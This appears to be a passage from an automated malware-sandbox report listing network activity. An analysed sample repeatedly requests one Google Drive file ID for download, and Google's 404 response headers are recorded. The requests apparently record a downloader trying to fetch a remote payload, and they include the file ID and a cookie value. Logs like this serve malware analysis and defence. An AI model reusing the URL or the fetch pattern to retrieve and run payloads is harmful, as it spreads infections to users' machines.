      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQRxjkIGfA5tlLHI4sB_wrr9_aJ4a90vwOxRb3-tTucYZXp2uBX902t0BkusxBLWsjIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:08 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-aA_ZR0f0BCBgdPSoN7LX8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU; expires=Sat, 12-Jul-2025 14:32:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6nQVZzX7OjgneRLkuPxLFJSj3gieiGHHX7Yx6rofX72iClNoI2EAetFIedSoc1pP9JContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QoWLUwcE8tb47_MzPxWpaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5BU9c99SYDNTRGFvVENQyj46YaRcBipwEyxNsKmO8-d16nHi1RXCQmXEPmY8FKIEDtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:31 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-IKIsCl_XsgTFIpEaBBGV0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77vVWG8zv1oikIQqRX_5zPlkDD9ufthX9c9uPCe3w68TtvECDDF_tqj7IExgwe1FTQf6_IX_sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:42 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_RsSWx8ndAptCJ5WgTnBew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41J0T9rcwAmomBrR5aj2KfVX_uwSnsubyD5rR_edViruEMXNBweUxlqUOwtQh9uNGpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:53 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-6q3oQVu49o-Zlobz29u_iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS7PyZKIdu5fsvm96mx7w5dvyIfBsgC8eY2aGpW8MzvaqTUz6Leup5ZZjrsgqP1pmE3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fKS1nCBZopWdm8Ixn1kRZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSqgw4Xcnoq_mmC0w82Es0CkINiBSNv3gdMKqZSIRhVhWRfYxEfbngKg-jXGBbBOiX8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-boktPEdIAOX-cEICFdwjaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6uIo5some-btXRcOLd22gMLvc_fEF3ARs7EjTXWqi_iJRU6uxBJH79s0pqNvkWtGR1Iv_7ivYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7A6MlT_rupybLNtKCERIEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com 